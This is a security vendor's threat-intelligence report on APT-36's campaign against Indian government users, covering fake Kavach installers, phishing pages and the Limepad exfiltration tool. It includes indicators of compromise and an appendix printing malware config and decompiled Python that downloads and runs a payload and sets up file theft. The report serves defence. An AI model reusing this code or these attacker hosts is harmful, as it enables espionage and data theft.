{ "id": "48a06cbb-1291-42b6-a997-6a43b5f38d9f", "created_at": "2026-04-06T00:13:41.755367Z", "updated_at": "2026-04-10T03:36:50.433451Z", "deleted_at": null, "sha1_hash": "ca2c5d672b73fcdcdabf713bd3d472aa160deac9", "title": "Indian Governmental Organizations Targeted by APT-36", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2570920, "plain_text": "Indian Governmental Organizations Targeted by APT-36\r\nBy Sudeep Singh\r\nPublished: 2022-11-03 · Archived: 2026-04-05 13:36:32 UTC\r\nSummary\r\nAPT-36 (also known as Transparent Tribe) is an advanced persistent threat group attributed to Pakistan that\r\nprimarily targets users working at Indian government organizations. Zscaler ThreatLabz has been closely\r\nmonitoring the activities of this group throughout 2022. Our tracking efforts have yielded new intelligence about\r\nthis APT group that has not previously been documented.\r\nIn this blog, we will describe how this group abuses Google advertisements for the purpose of malvertising to\r\ndistribute backdoored versions of Kavach multi-authentication (MFA) applications. We will shed light on the\r\ncomplete details of the attack chain that have not been previously shared in the public domain. This threat group\r\nhas also conducted very low-volume credential harvesting attacks masquerading as official Indian government\r\nwebsites, and luring unsuspecting users to enter their credentials.\r\nWe will also describe the functionalities of a completely new data exfiltration tool that we have discovered being\r\nused by the APT-36 group. We've dubbed this tool \"Limepad.\"\r\nKey points\r\nAPT-36 group is a Pakistan-based advanced persistent threat group which has specifically targeted\r\nemployees of Indian government related organizations.\r\n \r\nThis group has remained active throughout 2022 using various techniques such as malvertising, and\r\ncredential phishing attacks.\r\n \r\nAPT-36 has evolved their tactics, techniques and procedures (TTPs) incorporating new distribution\r\nmethods and new tools.\r\n \r\nThe threat actor registered multiple new domains hosting web pages masquerading as the official Kavach\r\napp download portal.\r\n \r\nThey abused the Google Ads paid search feature to push the malicious domains to the top of Google search\r\nresults for users in India.\r\n \r\nBeginning August 2022, the group started using a new data exfiltration tool which we have named\r\nLimepad. This tool was previously undocumented.\r\n \r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 1 of 24\n\nWhile most binaries used by APT-36 in this campaign will execute only if the user’s machine is configured\r\nwith India time zone (IST), we also found 2 binaries using the same code base which included a time zone\r\ncheck for both - India and Sri Lanka. Since both India and Sri Lanka have the same time zone, we consider\r\nthis check redundant.\r\n \r\nCredential harvesting attacks were used to spoof the National Informatics Center’s Kavach login page with\r\nthe goal of stealing credentials of government employees.\r\n \r\nSeveral instances involved malicious binaries compiled using PyInstaller and sent packaged inside VHDX\r\narchives.\r\n \r\nAttack flow\r\nFigure 1 illustrates the end-to-end attack-chain of the distribution of backdoored Kavach multi-factor\r\nauthentication (MFA) applications. Each part of this attack-chain is explained in more details in the later sections\r\nof the blog.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 2 of 24\n\nFigure 1: Malvertising campaign used to distribute backdoored Kavach MFA apps\r\nDistribution mechanism\r\nMalvertising\r\nThe malvertising aspect of APT-36 group has not been previously documented, so in this blog we will shed some\r\nlight on how the threat actor lures Indian government users to download backdoored Kavach multi-factor\r\nauthentication (MFA) applications.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 3 of 24\n\nThe threat actor routinely registered new domains and hosted web pages impersonating as the official Kavach\r\napplication download portal. It then abused Google Ads’ paid search feature, to push malicious attacker-registered\r\nfake websites to the top of the search results returned by Google for Kavach-related keywords such as “Kavach\r\ndownload” and “Kavach app,” when searched from India.\r\nSeveral of these fake Kavach websites were promoted this way throughout 2022. On average, the attacker\r\npromoted each website for a period of one month before cycling to the next one.\r\nFigure 2 shows a calendar highlighting different times at which the threat actor was abusing Google ads to\r\npromote corresponding malicious sites\r\n \r\nFigure 2: Calendar showing when the Google ads were run by APT-36\r\nThe complete list of malicious websites impersonating the Kavach portal are listed in the IOCs section.\r\nFigure 3 and 4 show two examples of how the malicious search result ads looked like at the time they were live.\r\nFigure 3: Google advertisement to promote kavach-app[.]com\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 4 of 24\n\nFigure 4: Google advertisement to promote kavach-app[.]in\r\nFigure 5 shows a web page impersonating the Kavach application download portal. The threat actor leveraged\r\nWordpress to host these webpages and the theme remained consistent across all the malicious pages.\r\nFigure 5: Attacker-registered site masquerading as Kavach app download portal\r\nThird party application stores\r\nIn addition to this, we also discovered that this threat group controls certain third party application stores which\r\noffer downloads for various applications. One such example is the acmarketsapp[.]com store. While at first this\r\nsite seems benign and appears to offer downloads for generic applications only, we noticed that the threat actor\r\nadded a few posts to download Indian government related applications such as Kavach and Hamraaz.\r\nUpon closer inspection and monitoring this website over a period of time, we uncovered the following new TTPs.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 5 of 24\n\nUpdating download links\r\nThis app store is used as a gateway to redirect the users to attacker-registered domains hosting the backdoored\r\nversions of Kavach application. Each time the threat actor registered a new malicious website, they would update\r\nthe download link on the app store to point to the latest attacker-registered site.\r\nTo understand this better, we took snapshot of this website at different points of time in 2022. By leveraging the\r\nweb archive feature, it can be seen in Figure 6 that in May 2022, the download link for Kavach on this app store\r\npointed to kavach-app[.]com (which is a confirmed attacker-registered domain used in the campaign).\r\nFigure 6: Snapshot of malicious link on acmarketsapp[.]com in May 2022\r\nA few months later in October 2022, the threat actor updated the link to point to another malicious site\r\n(kavachauthentication.blogspot[.]com) as shown in Figure 7.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 6 of 24\n\nFigure 7: Snapshot of malicious link on acmarketsapp[.]com in October 2022\r\nMalvertising\r\nThe app store - acmarketsapp[.]com itself is pushed to the top in Google search results for certain search keywords\r\nfrom India by abusing the Google Ads paid search feature as described earlier.\r\nBy combining these techniques, it allows APT-36 to operate these third party app stores as a gateway to redirect\r\nunsuspecting users to their malicious sites hosting the latest backdoored variants of Indian government\r\napplications.\r\nTechnical analysis\r\nA new data exfiltration tool - LimePad\r\nWe recently identified a new and previously undocumented data exfiltration tool used by this APT group. It is\r\ndistributed as a Python-based application packaged inside a VHDX file. Based on the unique strings present in the\r\nfirst iteration of this stealer, we have named it LimePad.\r\nIn this blog, we are sharing some of the key functionalities of this new tool. A more in-depth technical analysis\r\nwrite up of this tool will be published by us as a follow-up blog since we are still investigating their activities.\r\nSimilar to some of the other malicious binaries used by the SideCopy APT group in the past, this new tool is a\r\nPyInstaller-based payload as well. We found 2 unique examples of the new tool in-the-wild, both of which were\r\ndistributed inside very large VHDX files with size greater than 60 MB, each.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 7 of 24\n\nThe main purpose of this new tool is to constantly upload any new file of interest from the victim's machine to the\r\nattacker's server. It synchronizes this file stealing operation between the victim's machine and the attacker's server\r\nby maintaining a local custom SQLite database. This database holds the latest records of all the files which are\r\nuploaded, in queue or newly modified. It is done to ensure that any new files or modifications to existing local\r\nfiles are synced up with the remote server.\r\n \r\nTime zone check\r\nBefore starting any malicious activity, it checks whether the keyword \"india\" is present in the timezone config of\r\nthe machine. Due to this, the payload will execute only on machines configured in India time zone.\r\nOnce it confirms that the user is located in India, it will download a decoy PDF from the attacker’s server which is\r\ndisplayed to the victim as a social engineering lure.\r\nWe analyzed the objects in the decoy PDF file to recover the metadata corresponding to generation of the PDF and\r\nwe uncovered a key indicator which further helped us correlate this activity to APT-36 with a high-confidence.\r\n \r\nFigure 8 shows the metadata which indicates that this PDF was created with the author name: “Apolo Jones” and\r\nMicrosoft Word 2016 was used to generate the PDF.\r\n \r\nFigure 8: metadata of the decoy PDF file\r\nThis is the same string present in the PDB path of multiple backdoored variants of Kavach application used by\r\nAPT-36 in 2022.\r\nOne such example is the backdoored Kavach binary with MD5 hash:  6b552512c1b6479d8a8ae526663af864\r\nPDB path:  C:\\Users\\Apolo Jones\\source\\repos\\Kavach\\obj\\Release\\Kavach.pdb\r\nKey functionalities and configuration of Limepad\r\nThis data exfiltration tool is modular and contains many custom Python libraries developed by the attacker to\r\nassist the main functionality of LimePad. There is also a config file called \"control\" which is used by LimePad for\r\nits settings. The complete config file is available in the Appendix. Below we give a brief overview of the config\r\nfields which can help understand the features and functionalities of this stealer at a high-level.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 8 of 24\n\nVERSION field is configured as \"0.1-18\". This indicates that the tool is in very early stages of development by the\r\nthreat actor.\r\nUSERFILE defines the name of the local SQLite database which is used to keep track of the file sync operations.\r\nIn the first version of this tool, it was configured as \"Limepad.db\" due to which we have named this tool as\r\n\"Limepad\"\r\nThe fields, STARTDATA, LOCKDOORS, and DOORS are used to create a Windows URL Shortcut file which is\r\nused for the purpose of persistence. This URL shortcut file is placed in the Windows Startup directory with the\r\nname: \"Limepad.dll\" and it points to the local file path of the malicious payload as shown below.\r\n[InternetShortcut]\r\nURL=file:///\r\nA similar persistence mechanism was used by another tool in SideCopy APT's arsenal in 2021.\r\nSERVERS field is used to configure an array of attacker-controlled C2 servers. In both the identified samples,\r\nonly one C2 server was configured each time. However, the code has support for multiple C2 servers and will\r\ncycle through them until it finds a working C2 server.\r\nDUSSEN field contains a hex-encoded version of the string - \"india\". This is what is used for the India time zone\r\ncheck in the main subroutine of Limepad before starting any malicious activity.\r\nThe fields - DBTABLES, DBTABLES_INDEXES and SYNC_RULES_CONFIG all correspond to the structure\r\nand configuration of the tables in the local SQLite database.\r\nFigure 9 shows the structure of the local SQLite database used for synchronizing files between infected machine\r\nand server.\r\nFigure 9: Structure of the local SQLite database\r\nFigure 10 shows an example of contents of the SQLite database on an infected VM.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 9 of 24\n\nFigure 10: Contents of a database from an infected VM\r\nIt is important to note that \"SYNC_RULES_CONFIG\" contains a set of rules which defines which files the\r\nattacker is interested in stealing.\r\nIt has a different set of file extensions configured for HOME, FIXED and REMOVABLE drives. Based on the\r\nconfigured file extensions, it is evident that the threat actor is interested in stealing documents (PDF, text and MS\r\nOffice files), email local databases (DBX format) and various drawing file extensions such as DWG and DXF.\r\nThese drawing file extensions correspond to \"AutoCAD\" or computer-aided design vector files.\r\nNetwork communication\r\nBelow are the main steps in network communication of LimePad. It is important to note that in all cases, the user-agent used in network communication corresponds to the Python application. In this case - \"Python-urllib/2.7\".\r\nThis might change in future since the attacker can configure a custom user-agent to blend in with legit browser\r\ncommunication.\r\nAlso, in each request to the server, an HTTP request header field called \"Auth_Token\" will be present. This is used\r\nto authenticate with the C2 server. This value is the same as the password which is also sent in the HTTP request.\r\nThis 32 characters password is generated by base64-encoding the random value generated by os.random() using\r\nthe following code.\r\npassword = base64.urlsafe_b64encode(os.urandom(30))[:32]\r\nFigure 11 below shows the sequence of network requests sent by the data exfiltration tool.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 10 of 24\n\nFigure 11: network traffic from the data exfiltration tool\r\nBelow is a brief description of the different stages of network requests.\r\nServer check\r\nSends a GET request to the file bind.php on the server. Once the server responds with \"pong!\", it indicates the\r\nconfigured server is working well.\r\nRegistration of infected machine with the server\r\nSends a POST request to the file \"information.php\" on the server with the credentials used to register the infected\r\nmachine. The username and password are sent as both - HTTP POST request body and HTTP request headers.\r\n\"Username\" and \"Auth_Token\" fields in request headers correspond to the username and password respectively.\r\nPOST body format is: USERNAME=\u0026PASSWORD=\r\nThis is followed by a GET request to \"information.php\" to confirm user registration.\r\nUploading files to the server\r\nEach file upload request is in the form of HTTP POST request to the file \"adjustfile.php\" on the server. The local\r\nfile path is included in the URL. The contents of the file are uploaded in plaintext.\r\nMiscellaneous threat intel\r\nAs we indicated earlier, we are still investigating this case. We obtained the list of all the infected machines\r\nregistered with the attacker’s server. Figure 12 below shows a preview of the latest information. By looking at the\r\nusernames of the infected machines, it further confirmed to us that only the users in India were infected.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 11 of 24\n\nFigure 12: List of infected machines registered with the attacker’s server\r\nKavach payload analysis\r\nAs mentioned above in the distribution mechanism section, this threat actor uses various malvertising methods to\r\nlure unsuspecting Indian government employees to download a backdoored version of the Kavach multi-factor\r\nauthentication (MFA) application.\r\nFor the purpose of technical analysis we will consider the fake installer with the MD5 hash:\r\nfaeb19cd668de953afd6f2c953251665\r\nStage-1: Fake Installer\r\nThe fake installer is a .NET binary which masquerades as a legit Kavach application installer and uses fake\r\nmetadata information. Moreover, the binary uses an icon related to the National Informatics Center(NIC) which is\r\nan Indian government department under the Ministry of Electronics and Information Technology.\r\nOn execution, the binary performs following operations:\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 12 of 24\n\n1. Performs the time zone check and executes further only if the time zone matches Indian Standard Time (IST).\r\n2. Extracts and drops the legit Kavach installer in the path \"C:\\ProgramData\\Kavach-Auth\\\". The installer is\r\nextracted from the resource section of the binary.\r\n3. Downloads and drops the Stage-2 payload from the URL \"http://139.59.79[.]86/hardwell.mp3\" in the path\r\n\"C:\\ProgramData\\Kavach-Auth\\hardwell.mp3\"\r\n4. Executes the dropped legit Kavach installer\r\n5. Moves the dropped Stage-2 payload to the path \"C:\\ProgramData\\Kavach-Auth\\archiveviewer.scr\"\r\n6. Executes the dropped Stage-2 payload\r\nStage-2: PyInstaller compiled binary\r\nThe Stage-2 payload is a Python script compiled to an executable using PyInstaller. For analysis we extracted the\r\nPython script which we have included in the Appendix section.\r\nThe script on execution does following major operations:\r\n1. Creates the directory \"c:\\programdata\\WUDFHost\"\r\n2. Creates a log file in the path \"c:\\programdata\\WUDFHost\\logs.txt\" which is updated according to the operations\r\nperformed during further execution.\r\n3. Performs the time zone check.\r\n4. Downloads, drops and executes the next stage payload.\r\nFor the next stage payload, if the path \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\" exists, then the\r\npayload is downloaded from the URL \"http://139.59.79[.]86/WUDFHost45.zip\" in the path\r\n\"c:\\programdata\\WUDFHost45.zip\" else it is downloaded from the URL\r\n\"http://139.59.79[.]86/WUDFHost35.zip\" in the path \"c:\\programdata\\WUDFHost35.zip\"\r\nThe downloaded payload which is a ZIP file is extracted to path “c:\\programdata\\WUDFHost”. For the payload\r\nanalyzed, the archive contained three components:\r\n1. Executable (WUDFAgent.exe) - The loader binary\r\n2. DLL (oraclenotepad45.dll) - Main backdoor\r\n3. DLL (dotsqueeze.dll) - Helper DLL\r\nStage-3: Loader\r\nThe Stage-2 Python script executes the loader binary. The loader pretends to be a POS application which on\r\nexecution does following operations:\r\n1. Creates a log file in the path \"c:\\\\programdata\\\\WUDFHost\\\\process.txt\"\r\n2. Loads the assembly from the path \"c:\\\\programdata\\\\WUDFHost\\\\oraclenotepad45.dll\"\r\n3. Creates a fake file in the path \"c:\\\\\\\\programdata\\\\\\\\Expense_Account_Hierarchy.csv\" and writes fake\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 13 of 24\n\ninformation to it. The information written is extracted from the resource section.\r\n4. Pass the execution control to the loaded assembly\r\nStage-4: Backdoor\r\nThe assembly loaded by the loader is the main backdoor of the infection chain. Similar to Python script. We will\r\nnot cover the full technical analysis for the backdoor payload since it's already covered in some public blog posts\r\nbut in brief, it contains following functionalities:\r\n1. Taking snapshots\r\n2. Downloading new payloads and executing them\r\n3. Creating persistence\r\n4. Exfiltrating user and system information\r\n5. Exfiltrating file and directory information\r\nThe backdoor also uses a helper DLL where the malware author has delegated functionalities like file download\r\nfrom network, writing file to disk, creating new processes.\r\nCredential harvesting attack\r\nOne of the key targets of APT-36 is the Indian government and it targets the government users with various\r\nKavach related themes including credential harvesting attacks. These credentials can further be re-used by the\r\nthreat actor to gain access to government related infrastructure.\r\nA domain with the name nic-updates[.]in was registered on 25th August 2022 and it impersonated the official\r\nlogin page of NIC (National Informatics Center).\r\nThis domain redirected to the malicious login page only when accessed from an Indian IP address, else it\r\nredirected to the legitimate official domain of NIC - nic.in\r\nFigure 13 shows the credential phishing page.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 14 of 24\n\nFigure 13: Credential phishing page impersonating as Kavach NIC\r\nIt is important to note that the phishing URL was well-crafted as it mimicked the full URL path of the legit\r\nKavach NIC login page.\r\nFake login page URL:\r\nhxxps://kavach.mail.nic-updates[.]in/mfid/secureLogin_showSecureLogin.action#!\r\nLegit login page URL:\r\nhxxps://kavach.mail.gov[.]in/mfid/secureLogin_showSecureLogin.action#!\r\nThe phishing page sent the stolen credentials using an HTTP POST request to a file - error.php hosted on the\r\nattacker’s server.\r\nThe attacker’s server was using Zimbra and it even had an open directory hosted at the URL:\r\nhxxps://kavach.mail.nic-updates[.]in/mfid/secureLogin_showSecureLogin.action/web/\r\nFigure 14 shows the contents of the open directory.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 15 of 24\n\nFigure 14: Open directory on the server hosting the Kavach phishing page\r\nThe image file - kavach.jpg in the above open directory stood out based on the file creation date. We pivoted on\r\nthis image file’s hash, and observed that the same image was also referenced from kavach-app[.]com (a domain\r\nwhich we previously attributed to APT-36 group).\r\nWe also identified another phishing site (kavachmail-govin.rf[.]gd) used by this group using the same theme and\r\ncode base.\r\nZscaler detection status\r\n \r\nZscaler’s multilayered cloud security platform detects indicators at various levels, as seen here:\r\nWin32.Payload.Limepad\r\nWin64.Payload.Limepad\r\nWin32.Downloader.CrimsonRat\r\nWin32.Backdoor.SideCopy\r\nHTML.Phish.TransparentTribe\r\nConclusion\r\nAPT-36 continues to be one of the most prevalent advanced persistent threat groups focused on targeting users\r\nworking in Indian governmental organizations. As described in this blog, they leverage various tactics to lure the\r\nvictims.\r\nThis group has continued evolving its tactics, techniques and procedures (TTPs) while adding new tools to the\r\narsenal. Applications used internally at the Indian government organisations are a popular choice of social\r\nengineering theme used by APT-36 groups. Users should exercise caution while downloading applications and\r\nalways ensure to download the applications only from official sources.\r\nSince APT-36 leverages malvertising to hijack the Google search results, we advise the users to be extra careful\r\nwhen clicking on links on Google search results and always verify that they are indeed visiting the official\r\nwebsite.\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 16 of 24\n\nWe continue to closely monitor the latest developments of this APT group and ensure to protect our customers\r\nagainst these threats.\r\nIndicators of compromise \r\n \r\nLimepad C2 domains\r\nncloudup[.]com\r\ngcloudsvc[.]com\r\nCredential harvesting sites\r\nnic-updates[.]in\r\nkavachmail-govin[.]rf[.]gd\r\nAttacker-registered domains spoofing Kavach site\r\nkavach-app[.]com\r\nkavachguide[.]com\r\nkavach-app[.]in\r\nget-kavach[.]in\r\ngetkavach[.]com\r\nkavachsupport[.]com\r\nkavachdownload[.]in\r\nkavachauthentication.blogspot[.]com\r\nPost-infection IOCs\r\n139.59.79[.]86139.59.79[.]86/song.mp3\r\n139.59.79[.]86/OneDriveHandler45_bf.zip\r\n139.59.79[.]86/OneDriveHandler45.zip\r\n139.59.79[.]86/C2L!Dem0\u0026PeN/A@llPack3Ts/Cert.php\r\nwzxdao[.]com\r\nwzxdao[.]com/onedrivehandlerx86.zip\r\nwzxdao[.]com/OnrDriveHandlerx86.zip\r\nDecoy file URLs\r\nhxxp://139.59.23[.]88/confirmation_id.pdf\r\nhxxps://ncloudup[.]com/trendmic/details.pdf\r\nhxxp://wzxdao[.]com/resultupdate.jpg\r\nhttp://139.59.79[.]86/Pictures.jpg\r\nFile hashes\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 17 of 24\n\nFile MD5 hash Filename\r\n123b180ed44531bfbac27c6eb0bbe01d Update Portal.vhdx\r\n3817590cf8bec4a768bb84405590272f Student online update.exe\r\n0ed6451ffe34217e44355706f4900ecc NvidiaUpdate (2).scr\r\n94daa776792429d1cb65edc1d525e2fc Student detail.vhdx\r\nc195d6bb06c93b94d39e5c1a2dfc6792 Confirmation_ID.vhdx\r\n889c5c98e88c4889220617f57f5480f7 details.exe\r\nac3f2c8563846134bb42cb050813eac8 Confirmation_ID.exe\r\nAppendix\r\nLimepad config file\r\nimport os, logging\r\nfrom regulator import FileMatcher as r\r\nimport sys\r\nQUERY = []\r\nUSERHOME = os.path.join(os.environ['HOMEDRIVE'], os.environ['HOMEPATH'])\r\nclass FILEFLAG:\r\n    QUEUED, SYNCING, SYNCED, IGNORED = range(4)\r\nVERSION = '0.1-$Revision: 18 $'\r\nVERSION = VERSION.replace('$', '').replace('Revision: ', '').strip()\r\nSTARTDATA = os.path.join(os.environ['APPDATA'], 'Microsoft\\\\Windows\\\\Start\r\nMenu\\\\Programs\\\\Startup\\\\Limepad')\r\nROOTDATA = os.path.join(os.environ['APPDATA'], 'Limepad')\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 18 of 24\n\nUSERFILE = 'Limepad.db'\r\nUSERFILE = os.path.join(ROOTDATA, USERFILE)\r\nLOGFILE = 'Limepad.log'\r\nLOGFILE = os.path.join(os.environ['APPDATA'], LOGFILE)\r\nTEMP_UPLOAD_FOLDER = os.path.join(ROOTDATA, 'tup')\r\nLOCKDOORS = 'URL=file:///' + sys.executable\r\nDOORS = ['.dll', '.url']\r\nSERVERS = []\r\nDUSSEN = '696E646961'\r\nSERVER_PUBKEY = ''\r\nDBTABLES = {'file': [('path', 'VARCHAR'), ('filename', 'VARCHAR'), ('size', 'INT'), ('state', 'INT'), ('modified',\r\n'REAL'), ('created', 'REAL'), ('queuepriority', 'INT'), ('defertill', 'INT DEFAULT 0'), ('rpath', 'VARCHAR\r\nDEFAULT NULL')], 'syncdirs': [\r\n              ('path', 'VARCHAR'), ('rule', 'VARCHAR')], \r\n   'config': [\r\n            ('key', 'VARCHAR'), ('value', 'VARCHAR')]}\r\nDBTABLES_INDEXES = {'file': ('queuepriority', 'unique: path, filename'), 'config': ('unique: key', )}\r\nSYNC_RULES_CONFIG = {'HOME': r(\" '*.pdf' or '*.txt' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or\r\n'*.dxf' or '*.dbx' \"), \r\n   'FIXED': r(\" '*.pdf' or '*.doc*' or '*.xls*' or '*.ppt*' or '*.mdb*' or '*.dwg' or '*.dbx' \"), \r\n   'REMOVABLE': r(\" size OPTIMIZED_SEND_BLOCKSIZE = 256000\r\nLOG_LEVEL = logging.WARN\r\nlogging.basicConfig(filename=LOGFILE, level=LOG_LEVEL)\r\nif __name__ == '__main__':\r\n    print globals()\r\n \r\nKavach fake installer - Python decompiled code\r\nimport os\r\nfrom win32com.client import Dispatch\r\nimport platform\r\nimport time\r\n#from tzlocal import get_localzone\r\nimport sys\r\nfrom os.path import exists as file_exists\r\nimport urllib\r\nimport time\r\nfrom time import sleep\r\nimport zipfile\r\n#import win32com.client as win32\r\nimport win32com as win32\r\nimport subprocess\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 19 of 24\n\ndef is_os_64bit():\r\n    return platform.machine().endswith('64')\r\n     def append_me(text):\r\n    with open(\"c:\\programdata\\WUDFHost\\logs.txt\", \"a\") as myfile:\r\n        myfile.write(text)\r\n         def write_me(text):\r\n    if file_exists(\"c:\\programdata\\WUDFHost\\logs.txt\") is True:\r\n        print('bab')\r\n        pass\r\n    else:\r\n        print('damn')\r\n        with open(\"c:\\programdata\\WUDFHost\\logs.txt\", \"w\") as myfile:\r\n            myfile.write(text)\r\n         def create_dir(text):\r\n    if os.path.exists(text) is False:\r\n        os.mkdir(text)\r\n         def download_us(url,path):\r\n    if os.path.exists(path) is False:\r\n        urllib.urlretrieve(url,path)\r\n    else:\r\n        print(\"skipping\")\r\n        append_me(\"skipping\")\r\n         def define_me(text):\r\n    try:\r\n        if os.path.exists(text) is True:\r\n            print(\"zip file exists\")\r\n            append_me(\"zip file exists\")\r\n            with zipfile.ZipFile(text, 'r') as zip_ref:\r\n                zip_ref.extractall(\"c:\\\\programdata\\\\WUDFHost\")\r\n        else:\r\n            print(\"not find extracted file\")\r\n            append_me(\"not find extracted file\")\r\n    except Exception as e:\r\n        print(\"already running file\")\r\n         def deaf():\r\n    try:\r\n        if os.path.exists(\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\") is True:\r\n            download_us(\"http://\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 20 of 24\n\n/WUDFHost45.zip\",\"c:\\\\programdata\\WUDFHost45.zip\")\r\n            define_me(\"c:\\\\programdata\\\\WUDFHost45.zip\")\r\n            pass\r\n        else:\r\n            download_us(\"http:///WUDFHost35.zip\",\"c:\\\\programdata\\WUDFHost35.zip\")\r\n            define_me(\"c:\\\\programdata\\\\WUDFHost35.zip\")\r\n            pass\r\n    except Exception as e:\r\n        print(\"excption in deaf\")\r\n         def openWorkbook(xlapp, xlfile):\r\n    try:        \r\n        xlwb = xlapp.Workbooks(xlfile)\r\n        #xlwb.Close(True)\r\n    except Exception as e:\r\n        try:\r\n            xlwb = xlapp.Workbooks.Open(xlfile)\r\n            #xlwb.Close(True)\r\n        except Exception as e:\r\n            print(e)\r\n            xlwb = None                    \r\n    return(xlwb)\r\n     def define_me_replica(text):\r\n    try:\r\n        if os.path.exists(text) is True:\r\n            print(\"zip file exists\")\r\n            append_me(\"zip file exists\")\r\n            username = os.environ['USERNAME']\r\n            print(username)\r\n            with zipfile.ZipFile(text, 'r') as zip_ref:\r\n                zip_ref.extractall(\"c:\\\\users\\\\\"+username+\"\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start\r\nMenu\\\\Programs\\\\Startup\")\r\n        else:\r\n            print(\"not find extracted file\")\r\n            append_me(\"not find extracted file\")\r\n    except Exception as e:\r\n        print(\"already running file\")\r\n     def def_frames():\r\n    try:\r\n        if os.path.exists(\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\") is True:\r\n            download_us(\"http://\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 21 of 24\n\n/WUDFAgent_45.zip\",\"c:\\\\programdata\\\\WUDFAgent_45.zip\")\r\n            define_me_replica(\"c:\\\\programdata\\\\WUDFAgent_45.zip\")\r\n            pass\r\n        else:\r\n            download_us(\"http:///WUDFAgent_35.zip\",\"c:\\\\programdata\\\\WUDFAgent_35.zip\")\r\n            define_me_replica(\"c:\\\\programdata\\\\WUDFAgent_35.zip\")\r\n            pass\r\n    except Exception as e:\r\n        pass\r\ndef patience_limit():\r\n    try:\r\n        if os.path.exists(\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\") is True:\r\n            subprocess.Popen([\"c:\\\\programdata\\\\WUDFHost\\\\WUDFAgent.exe\"])\r\n            pass\r\n        else:\r\n            subprocess.Popen([\"c:\\\\programdata\\\\WUDFHost\\\\WUDFAgent.exe\"])\r\n            pass\r\n    except Exception as e:\r\n        pass\r\nif __name__ == '__main__':\r\n    try:\r\n        create_dir(\"c:\\programdata\\WUDFHost\")\r\n        write_me(\"Starter\\n\")\r\n        #list_folders = []\r\n        #list_files = []\r\n        #lines = ''\r\n        username = os.environ['USERNAME']\r\n        #for root, dirs,files in os.walk('c:\\\\users\\\\'+username+'\\\\appdata',topdown=False):\r\n        #    for name in files:\r\n        #        print(os.path.join(root,name))\r\n        #        list_folders.append(os.path.join(root,name))\r\n        #    for name in dirs:\r\n        #        print(os.path.join(root,name))\r\n        #        list_files.append(os.path.join(root,name))\r\n        print(\"Directory Created\")\r\n        if '.py'  not in sys.argv[0]:\r\n            #create_dir(\"c:\\programdata\\WUDFHost\")\r\n            print(\"Directory Created\")\r\n                         #write_me(\"Starter\")\r\n            print(\"Log File Created\")\r\nhttps://www.zscaler.com/blogs/security-research/apt-36-uses-new-ttps-and-new-tools-target-indian-governmental-organizations\r\nPage 22 of 24\n\ntzname = time.tzname\r\n            #local_tz = get_localzone()\r\n            print(\"Got the TimeZone\")\r\n            append_me(\"Got the TimeZone : \"+str(tzname) + \"\\n\")\r\n            if \"sri lanka\" in str(tzname).lower() or \"india\" in str(tzname).lower():\r\n                print(\"Correctly Identified TimeZone\")\r\n                if os.path.exists(\"c:\\\\Program Files\\\\Microsoft Office\\\\Office15\")  is True or os.path.exists(\"c:\\\\Program\r\nFiles\\\\Microsoft Office\\\\Office16\") is True:\r\n                    print(\"Office is 2010 or 2016\")\r\n                    append_me(\"Office is 2010 or 2016\\n\")\r\n                    if is_os_64bit():\r\n                        print(\"Machine is x64\")\r\n                        append_me(\"Machine is x64\\n\")\r\n                                                 append_me(\"File Downloading Started\\n\")\r\n                        print(\"File Downloading Started\")\r\n                                                 ##def_frames()\r\n                                                 append_me(\"All Files Downloaded\\n\")\r\n                        print(\"All Files Downloaded\")\r\n                                                                          deaf()\r\n                                                 